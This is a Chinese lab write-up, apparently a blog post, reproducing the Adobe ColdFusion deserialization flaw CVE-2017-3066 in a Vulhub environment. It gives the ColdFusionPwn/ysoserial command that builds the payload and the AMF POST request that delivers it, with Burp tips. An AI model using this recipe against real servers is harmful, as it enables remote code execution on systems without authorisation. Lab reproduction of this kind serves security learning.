Vulhub-coldfusion--CVE-2017-3066

1、漏洞描述

Adobe ColdFusion是美国Adobe公司的一种动态Web服务器产品,其运行的CFML(ColdFusion标记语言)是针对Web应用程序的一种程序设计语言。
攻击者可利用该漏洞在冲突应用程序的一部分中执行任意代码或造成拒绝服务。以下版本受到影响:Adobe ColdFusion(2016版)更新3及之前的版本, ColdFusion 11 Update 11及之前的版本,ColdFusion 10 Update 22及之前的版本。

2、启动靶场

在这里插入图片描述

3、访问网址

http://x.x.x.x:8500
在这里插入图片描述发现是404网页,接着去访问
http://x.x.x.x:8500/CFIDE/administrator/index.cfm
在这里插入图片描述发现这个网页和上个漏洞一样,但是这个网页是要输入vulhub,即可成功安装Adobe ColdFusion
在这里插入图片描述

3、我们使用ColdFusionPwn工具来生成POC

java -cp ColdFusionPwn-0.0.1-SNAPSHOT-all.jar:ysoserial.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner -e CommonsBeanutils1 'touch /tmp/success' poc.ser

我在centos靶机上执行是不可以的
在这里插入图片描述但是在kali上是可以运行的
在这里插入图片描述

4、生成poc.ser文件后,将POC作为数据包body发送给

http://your-ip:8500/flex2gateway/amf,Content-Type为application/x-amf:
POST /flex2gateway/amf HTTP/1.1
Host: your-ip:8500
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-amf
Content-Length: 2853

在这里插入图片描述

5、发送poc内容

由于编码问题,如果直接从Notepad++/Notepad里面复制粘贴为body部分,是不成功的,即使返回的状态码是200
在这里插入图片描述正确的方法应该是:
右击选择Paste From File,上传poc.cer文件
在这里插入图片描述再到Raw界面添加HTTP头部,如果成功,并且打算以后还需要用的话,右击选择Copy to File保存
在这里插入图片描述

6、进入容器检验poc

通过docekrid进入容器
Docker exec docker容器id -it /bin/bash
在这里插入图片描述

7、看到success即为复现成功

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值